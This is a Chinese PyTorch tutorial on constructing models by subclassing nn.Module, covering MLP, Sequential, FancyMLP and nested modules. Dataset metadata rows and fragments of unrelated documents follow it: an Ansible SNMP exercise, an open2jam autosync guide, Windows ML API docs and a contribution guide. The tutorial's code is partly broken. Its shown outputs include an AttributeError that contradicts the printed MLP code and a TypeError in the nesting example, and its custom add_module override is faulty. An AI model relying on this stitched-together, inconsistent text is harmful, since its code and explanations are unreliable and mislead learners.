# 模型构造 让我们回顾一下在[“多层感知机的简洁实现”](../chapter_deep-learning-basics/mlp-gluon.md)一节中含单隐藏层的多层感知机的实现方法。我们首先构造`Sequential`实例,然后依次添加两个全连接层。其中第一层的输出大小为256,即隐藏层单元个数是256;第二层的输出大小为10,即输出层单元个数是10。我们在上一章的其他 节中也使用了`Sequential`类构造模型。这里我们介绍另外一种基于`Module`类的模型构造方法:它让模型构造更加灵活。 ## 继承`Module`类来构造模型 `Module`类是`nn`模块里提供的一个模型构造类,我们可以继承它来定义我们想要的模型。下面继承`Module`类构造本节开头提到的多层感知机。这里定义的`MLP`类重载了`Mudule`类的`__init__`函数和`forward`函数。它们分别用于创建模型参数和定义前向计算。前向计算也即正向传播。 ```{.python .input n=20} import torch import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable class MLP(nn.Module): # 声明带有模型参数的层,这里声明了两个全连接层 def __init__(self, **kwargs): # 调用MLP父类Block的构造函数来进行必要的初始化。这样在构造实例时还可以指定其他函数 # 参数,如“模型参数的访问、初始化和共享”一节将介绍的模型参数params super(MLP, self).__init__(**kwargs) self.hidden = nn.Sequential(nn.Linear(20,256), nn.ReLU()) self.output = nn.Linear(256,10) # 定义模型的前向计算,即如何根据输入x计算返回所需要的模型输出 def forward(self, x): h1 = self.hidden(x) return self.output(h1) ``` 以上的`MLP`类中无须定义反向传播函数。系统将通过自动求梯度而自动生成反向传播所需的`backward`函数。 我们可以实例化`MLP`类得到模型变量`net`。下面的代码初始化`net`并传入输入数据`X`做一次前向计算。其中,`net(X)`会调用`MLP`继承自`Block`类的`__call__`函数,这个函数将调用`MLP`类定义的`forward`函数来完成前向计算。 ```{.python .input n=21} net = MLP() X = torch.randn((2,20)) net(X) ``` ```{.json .output n=21} [ { "ename": "AttributeError", "evalue": "cannot assign module before Module.__init__() call", "output_type": "error", "traceback": [ "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[0;31mAttributeError\u001b[0m Traceback (most recent call last)", "\u001b[0;32m<ipython-input-21-ab6c429b6c79>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mnet\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mMLP\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 2\u001b[0m \u001b[0mX\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtorch\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mrandn\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;36m20\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 3\u001b[0m \u001b[0mnet\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mX\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;32m<ipython-input-20-f65c14774477>\u001b[0m in \u001b[0;36m__init__\u001b[0;34m(self, **kwargs)\u001b[0m\n\u001b[1;32m 10\u001b[0m \u001b[0;31m# \u53c2\u6570\uff0c\u5982\u201c\u6a21\u578b\u53c2\u6570\u7684\u8bbf\u95ee\u3001\u521d\u59cb\u5316\u548c\u5171\u4eab\u201d\u4e00\u8282\u5c06\u4ecb\u7ecd\u7684\u6a21\u578b\u53c2\u6570params\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 11\u001b[0m \u001b[0;31m# super(MLP, self).__init__(**kwargs)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 12\u001b[0;31m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mhidden\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mnn\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mSequential\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mnn\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mLinear\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m20\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;36m256\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mnn\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mReLU\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 13\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0moutput\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mnn\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mLinear\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m256\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 14\u001b[0m \u001b[0;31m# \u5b9a\u4e49\u6a21\u578b\u7684\u524d\u5411\u8ba1\u7b97\uff0c\u5373\u5982\u4f55\u6839\u636e\u8f93\u5165x\u8ba1\u7b97\u8fd4\u56de\u6240\u9700\u8981\u7684\u6a21\u578b\u8f93\u51fa\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;32m~/miniconda3/envs/gluon/lib/python3.6/site-packages/torch/nn/modules/module.py\u001b[0m in \u001b[0;36m__setattr__\u001b[0;34m(self, name, value)\u001b[0m\n\u001b[1;32m 563\u001b[0m \u001b[0;32mif\u001b[0m \u001b[0mmodules\u001b[0m \u001b[0;32mis\u001b[0m \u001b[0;32mNone\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 564\u001b[0m raise AttributeError(\n\u001b[0;32m--> 565\u001b[0;31m \"cannot assign module before Module.__init__() call\")\n\u001b[0m\u001b[1;32m 566\u001b[0m \u001b[0mremove_from\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m__dict__\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_parameters\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_buffers\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 567\u001b[0m \u001b[0mmodules\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mname\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mvalue\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;31mAttributeError\u001b[0m: cannot assign module before Module.__init__() call" ] } ] ``` 注意,这里并没有将`Module`类命名为`Layer`(层)或者`Model`(模型)之类的名字,这是因为该类是一个可供自由组建的部件。它的子类既可以是一个层(如torch提供的`Dense`类),又可以是一个模型(如这里定义的`MLP`类),或者是模型的一个部分。我们下面通过两个例子来展示它的灵活性。 ## `Sequential`类继承自`Module`类 我们刚刚提到,`Module`类是一个通用的部件。事实上,`Sequential`类继承自`Module`类。当模型的前向计算为简单串联各个层的计算时,可以通过更加简单的方式定义模型。这正是`Sequential`类的目的:它提供`add_module`函数来逐一添加串联的`Module`子类实例,而模型的前向计算就是将这些实例按添加的顺序逐一计算。 下面我们实现一个与`Sequential`类有相同功能的`MySequential`类。这或许可以帮助读者更加清晰地理解`Sequential`类的工作机制。 ```{.python .input n=6} class MySequential(nn.Module): def __init__(self, **kwargs): super(MySequential, self).__init__(**kwargs) def add_module(self, block): # module是一个Module子类实例,假设它有一个独一无二的名字。我们将它保存在Module类的 # 成员变量_children里,其类型是OrderedDict。 self._modules[block] = block def forward(self, x): # OrderedDict保证会按照成员添加时的顺序遍历成员 for module in self._modules.values(): x = module(x) return x ``` 我们用`MySequential`类来实现前面描述的`MLP`类,并使用随机初始化的模型做一次前向计算。 ```{.python .input n=7} net = MySequential() net.add_module(nn.Linear(20,256)) net.add_module(nn.ReLU()) net.add_module(nn.Linear(256,10)) x = torch.randn(2,20) net(X) ``` ```{.json .output n=7} [ { "name": "stdout", "output_type": "stream", "text": "Linear(in_features=20, out_features=256, bias=True)\nReLU()\nLinear(in_features=256, out_features=10, bias=True)\n" }, { "data": { "text/plain": "tensor([[-0.1633, 0.0289, 0.1495, -0.0458, -0.1448, -0.0628, -0.2764, 0.1655,\n -0.1896, -0.0275],\n [-0.0330, 0.4147, 0.2681, 0.0520, 0.0607, 0.0231, 0.0757, 0.2142,\n 0.3637, 0.2295]], grad_fn=<AddmmBackward>)" }, "execution_count": 7, "metadata": {}, "output_type": "execute_result" } ] ``` 可以观察到这里`MySequential`类的使用跟[“多层感知机的简洁实现”](../chapter_deep-learning-basics/mlp-gluon.md)一节中`Sequential`类的使用没什么区别。 ## 构造复杂的模型 虽然`Sequential`类可以使模型构造更加简单,且不需要定义`forward`函数,但直接继承`Module`类可以极大地拓展模型构造的灵活性。下面我们构造一个稍微复杂点的网络`FancyMLP`。在这个网络中,我们通过`Parameter`创建训练中不被迭代的参数,即常数参数。在前向计算中,除了使用创建的常数参数外,我们还使用`Tensor`的函数和Python的控制流,并多次调用相同的层。 ```{.python .input n=28} class FancyMLP(nn.Module): def __init__(self, **kwargs): super(FancyMLP, self).__init__(**kwargs) # 使用get_constant创建的随机权重参数不会在训练中被迭代(即常数参数) self.dense1 = nn.Sequential(nn.Linear(20,20), nn.ReLU()) self.rand_weight = nn.Parameter(torch.empty(20,20).uniform_(0,1)) self.dense = nn.Sequential(nn.Linear(20,256), nn.ReLU()) self.register_buffer('random_weights', self.rand_weight) def forward(self, x): x = self.dense1(x) x = F.relu(torch.mm(x, Variable(self.rand_weight).data)+1) x = self.dense(x) while x.norm().item() > 1: x /= 2 if x.norm().item() < 0.8: x *= 10 return x.sum() ``` 在这个`FancyMLP`模型中,我们使用了常数权重`rand_weight`(注意它不是模型参数)、做了矩阵乘法操作(`nd.dot`)并重复使用了相同的`Dense`层。下面我们来测试该模型的随机初始化和前向计算。 ```{.python .input n=29} net = FancyMLP() x = torch.randn(2,20) net(X) ``` ```{.json .output n=29} [ { "data": { "text/plain": "tensor(11.1770, grad_fn=<SumBackward0>)" }, "execution_count": 29, "metadata": {}, "output_type": "execute_result" } ] ``` 因为`FancyMLP`和`Sequential`类都是`Module`类的子类,所以我们可以嵌套调用它们。 ```{.python .input n=31} class NestMLP(nn.Module): def __init__(self, **kwargs): super(NestMLP, self).__init__(**kwargs) self.net = nn.Sequential(nn.Linear(20,64),nn.ReLU(),nn.Linear(64, 32),nn.ReLU()) # self.net = [nn.Linear(20,64),nn.ReLU(),nn.Linear(64, 32),nn.ReLU()] self.dense = nn.Sequential(nn.Linear(32,20),nn.ReLU()) def forward(self, x): return self.dense(self.net(x)) net = nn.Sequential() net.add_module("Linear1",nn.Linear(20,20)) net.add_module("NestNlp",NestMLP()) net.add_module("FancyMLP",FancyMLP()) net(X) ``` ```{.json .output n=31} [ { "ename": "TypeError", "evalue": "'list' object is not callable", "output_type": "error", "traceback": [ "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[0;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[0;32m<ipython-input-31-43860fa6c5fe>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 14\u001b[0m \u001b[0mnet\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0madd_module\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\"FancyMLP\"\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mFancyMLP\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 15\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 16\u001b[0;31m \u001b[0mnet\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mX\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[0;32m~/miniconda3/envs/gluon/lib/python3.6/site-packages/torch/nn/modules/module.py\u001b[0m in \u001b[0;36m__call__\u001b[0;34m(self, *input, **kwargs)\u001b[0m\n\u001b[1;32m 491\u001b[0m \u001b[0mresult\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_slow_forward\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0minput\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 492\u001b[0m \u001b[0;32melse\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 493\u001b[0;31m \u001b[0mresult\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mforward\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0minput\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 494\u001b[0m \u001b[0;32mfor\u001b[0m \u001b[0mhook\u001b[0m \u001b[0;32min\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_forward_hooks\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mvalues\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 495\u001b[0m \u001b[0mhook_result\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mhook\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0minput\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mresult\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;32m~/miniconda3/envs/gluon/lib/python3.6/site-packages/torch/nn/modules/container.py\u001b[0m in \u001b[0;36mforward\u001b[0;34m(self, input)\u001b[0m\n\u001b[1;32m 90\u001b[0m \u001b[0;32mdef\u001b[0m \u001b[0mforward\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0minput\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 91\u001b[0m \u001b[0;32mfor\u001b[0m \u001b[0mmodule\u001b[0m \u001b[0;32min\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_modules\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mvalues\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 92\u001b[0;31m \u001b[0minput\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mmodule\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0minput\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 93\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0minput\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 94\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;32m~/miniconda3/envs/gluon/lib/python3.6/site-packages/torch/nn/modules/module.py\u001b[0m in \u001b[0;36m__call__\u001b[0;34m(self, *input, **kwargs)\u001b[0m\n\u001b[1;32m 491\u001b[0m \u001b[0mresult\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_slow_forward\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0minput\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 492\u001b[0m \u001b[0;32melse\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 493\u001b[0;31m \u001b[0mresult\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mforward\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0minput\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 494\u001b[0m \u001b[0;32mfor\u001b[0m \u001b[0mhook\u001b[0m \u001b[0;32min\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0m_forward_hooks\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mvalues\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 495\u001b[0m \u001b[0mhook_result\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mhook\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0minput\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mresult\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;32m<ipython-input-31-43860fa6c5fe>\u001b[0m in \u001b[0;36mforward\u001b[0;34m(self, x)\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 8\u001b[0m \u001b[0;32mdef\u001b[0m \u001b[0mforward\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 9\u001b[0;31m \u001b[0;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mdense\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mnet\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 10\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 11\u001b[0m \u001b[0mnet\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mnn\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mSequential\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;31mTypeError\u001b[0m: 'list' object is not callable" ] } ] ``` ## 小结 * 可以通过继承`Module`类来构造模型。 * `Sequential`类继承自`Module`类。 * 虽然`Sequential`类可以使模型构造更加简单,但直接继承`Module`类可以极大地拓展模型构造的灵活性。 ## 练习 * 如果不在`MLP`类的`__init__`函数里调用父类的`__init__`函数,会出现什么样的错误信息? * 如果去掉`FancyMLP`类里面的`item`函数,会有什么问题? * 如果将`NestMLP`类中通过`Sequential`实例定义的`self.net`改为`self.net = [nn.Dense(64, activation='relu'), nn.Dense(32, activation='relu')]`,会有什么问题? ## 扫码直达[讨论区](https://discuss.gluon.ai/t/topic/986) ![](../img/qr_model-construction.svg)
76.026906
1,894
0.701722
yue_Hant
0.191366
484914330f8b07d9b6943e63a1216384e380f307
130
md
Markdown
day2/more_config/more_config_ex1.md
twin-bridges/ansible-ons
57c037651a46c0993033ff0aeec27b11c65e920f
[ "Apache-2.0" ]
1
2021-01-11T23:18:34.000Z
2021-01-11T23:18:34.000Z
day2/more_config/more_config_ex1.md
twin-bridges/ansible-ons
57c037651a46c0993033ff0aeec27b11c65e920f
[ "Apache-2.0" ]
null
null
null
day2/more_config/more_config_ex1.md
twin-bridges/ansible-ons
57c037651a46c0993033ff0aeec27b11c65e920f
[ "Apache-2.0" ]
5
2019-09-24T21:09:47.000Z
2020-06-18T14:57:44.000Z
# More Configuration Exercise 1 1. Using any means you'd like, configure the snmp location and contact info for the NXOS hosts.
26
95
0.776923
eng_Latn
0.997353
48497518078390f35998a000c3d99592b56eae47
1,083
md
Markdown
docs/autosync.md
WaiHong91/open2jam
de2188df4201971fd3449629a91168d22bb3ce37
[ "Artistic-2.0" ]
82
2015-01-20T07:37:24.000Z
2022-01-27T14:45:18.000Z
docs/autosync.md
keigen-shu/open2jam
d6433606f29677429b5930dab2cf28a72e7cffcb
[ "Artistic-2.0" ]
8
2016-09-27T08:43:09.000Z
2021-01-23T08:41:06.000Z
docs/autosync.md
keigen-shu/open2jam
d6433606f29677429b5930dab2cf28a72e7cffcb
[ "Artistic-2.0" ]
34
2015-06-27T12:20:01.000Z
2022-03-01T13:52:42.000Z
How to Use AutoSync =================== First, you have to pick an easy song that you know well. That song should have keysounds. Then: 1. Autosync the display lag 2. Autosync the audio latency Autosyncing Display Lag ----------------------- Mute the sound, check the box "autosync" next to the "display lag" box, set the speed at your comfortable level, then start playing that song. Try to press the key at the same time that you see the note hits the judgment bar. Ignore the judgment that it gives (open2jam will adapt to your timing). Autosyncing Audio Latency ------------------------- Turn the sound back on, check the box "autosync" next to the "audio latency" box, make the speed a little bit slower, then start playing that song. This time, try to press the key at the same time that you hear the sound of the music. Ignore that the notes may already passed through the judgment line when you pressed the key (open2jam will adapt to your timing). In other words, try to make the sound of your finger hitting the keyboard in sync with the sound of the music.
34.935484
216
0.722068
eng_Latn
0.999565
484a6aaf083953b16b8d372c366155ac54706777
72
md
Markdown
TODO.md
betafcc/map-util
cb2ff8575749d7382bfd0560bc0f69e6e321d6d7
[ "MIT" ]
2
2017-06-25T20:45:46.000Z
2017-11-02T11:34:19.000Z
TODO.md
betafcc/map-util
cb2ff8575749d7382bfd0560bc0f69e6e321d6d7
[ "MIT" ]
null
null
null
TODO.md
betafcc/map-util
cb2ff8575749d7382bfd0560bc0f69e6e321d6d7
[ "MIT" ]
null
null
null
mapUtil - [ ] .fmap - [ ] .fmap.key((k, v) => ...)(MapLike)
18
47
0.375
kor_Hang
0.067605
484a8f4e1d846c8488044f4f39820efcf9df7d11
977
md
Markdown
content/post/statmodeling-stat-columbia-edu-2019-12-08-field-goal-kicking-putting-in-3d.md
chuxinyuan/daily
dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c
[ "MIT" ]
8
2018-03-27T05:17:56.000Z
2021-09-11T19:18:07.000Z
content/post/statmodeling-stat-columbia-edu-2019-12-08-field-goal-kicking-putting-in-3d.md
chuxinyuan/daily
dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c
[ "MIT" ]
16
2018-01-31T04:27:06.000Z
2021-10-03T19:54:50.000Z
content/post/statmodeling-stat-columbia-edu-2019-12-08-field-goal-kicking-putting-in-3d.md
chuxinyuan/daily
dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c
[ "MIT" ]
12
2018-01-27T15:17:26.000Z
2021-09-07T04:43:12.000Z
--- title: Field goal kicking—like putting in 3D with oblong balls date: '2019-12-08' linkTitle: https://statmodeling.stat.columbia.edu/2019/12/08/field-goal-kicking-putting-in-3d/ source: Statistical Modeling, Causal Inference, and Social Science description: Putting Andrew Gelman (the author of most posts on this blog, but not this one), recently published a Stan case study on golf putting [link fixed] that uses a bit of geometry to build a regression-type model based on angles and force. Field-goal kicking In American football, there&#8217;s also a play called a &#8220;field goal.&#8221; ... disable_comments: true --- Putting Andrew Gelman (the author of most posts on this blog, but not this one), recently published a Stan case study on golf putting [link fixed] that uses a bit of geometry to build a regression-type model based on angles and force. Field-goal kicking In American football, there&#8217;s also a play called a &#8220;field goal.&#8221; ...
75.153846
340
0.767656
eng_Latn
0.994916
484acf41407f213504aafe73031fb82251350aa4
274
md
Markdown
CONTRIBUTING.md
iz-podpolja/cordova-plugin-googlemaps
b87de60f31c286d8bd17ad0b1ce6d8061ad28d3e
[ "Apache-2.0" ]
1
2022-01-23T15:32:13.000Z
2022-01-23T15:32:13.000Z
CONTRIBUTING.md
iz-podpolja/cordova-plugin-googlemaps
b87de60f31c286d8bd17ad0b1ce6d8061ad28d3e
[ "Apache-2.0" ]
1
2018-07-07T04:37:25.000Z
2018-07-07T04:37:25.000Z
CONTRIBUTING.md
iz-podpolja/cordova-plugin-googlemaps
b87de60f31c286d8bd17ad0b1ce6d8061ad28d3e
[ "Apache-2.0" ]
null
null
null
# Pull request guide Thank you for considering to improve this cordova-plugin-googlemaps. When you create a pull request, please make it to **multiple_maps** branch instead of master branch. Because **the multiple_maps branch is edge version**. Thank you for your help.
27.4
100
0.781022
eng_Latn
0.997359
484afc9b29f282a5276888b52c32892fd2f19c5a
2,035
md
Markdown
docs/windows-ml/custom-operators/MLOperatorAttributeNameValue.md
crahrig/windows-ai-docs
ecd33843dd548e443a1292d6a22e1a4029298944
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/windows-ml/custom-operators/MLOperatorAttributeNameValue.md
crahrig/windows-ai-docs
ecd33843dd548e443a1292d6a22e1a4029298944
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/windows-ml/custom-operators/MLOperatorAttributeNameValue.md
crahrig/windows-ai-docs
ecd33843dd548e443a1292d6a22e1a4029298944
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: MLOperatorAttributeNameValue struct description: Specifies the name and value(s) of an attribute of a custom operator. ms.date: 4/1/2019 ms.topic: article keywords: windows 10, windows machine learning, WinML, custom operators, MLOperatorAttributeNameValue ms.localizationpriority: medium topic_type: - APIRef api_type: - NA api_name: - MLOperatorAttributeNameValue api_location: - MLOperatorAuthor.h --- # MLOperatorAttributeNameValue struct Specifies the name and value(s) of an attribute of a custom operator. This is used when registering custom operator kernels and custom operator schema. ## Fields | Name | Type | Description | |------------|-------------------------|-------------| | floats | **const float*** | 32-bit floating point value(s). Used when the type field is **MLOperatorAttributeType::Float** or **MLOperatorAttributeType::FloatArray**. | | ints | **const int64_t*** | 64-bit integer value(s). Used when the type field is **MLOperatorAttributeType::Int** or **MLOperatorAttributeType::IntArray**. | | name | **const char*** | NULL-terminated UTF-8 string representing the name of the attribute in the associated operator type. | | reserved | **const void*** | | | strings | **const char\* const*** | NULL-terminated UTF-8 string value(s). Used when the type field is **MLOperatorAttributeType::String** or **MLOperatorAttributeType::StringArray**. | | type | [MLOperatorAttributeType](MLOperatorAttributeType.md) | The type of the attribute in the associated operator type. | | valueCount | **uint32_t** | The number of elements in the attribute value. This must be 1, except for attributes which are of array types. | ## Requirements | | | |-|-| | **Minimum supported client** | Windows 10, build 17763 | | **Minimum supported server** | Windows Server 2019 with Desktop Experience | | **Header** | MLOperatorAuthor.h | [!INCLUDE [help](../../includes/get-help.md)]
47.325581
195
0.679115
eng_Latn
0.932806
484bd687da3bf0c92c160a79bfa927811bc9c331
2,286
md
Markdown
src/pages/blog/2017/05/01-03.md
Neos21GitHub/neo.s21.xrea.com
8b867683273ba36cf7cccd6ff0037e60f7243599
[ "MIT" ]
null
null
null
src/pages/blog/2017/05/01-03.md
Neos21GitHub/neo.s21.xrea.com
8b867683273ba36cf7cccd6ff0037e60f7243599
[ "MIT" ]
null
null
null
src/pages/blog/2017/05/01-03.md
Neos21GitHub/neo.s21.xrea.com
8b867683273ba36cf7cccd6ff0037e60f7243599
[ "MIT" ]
null
null
null
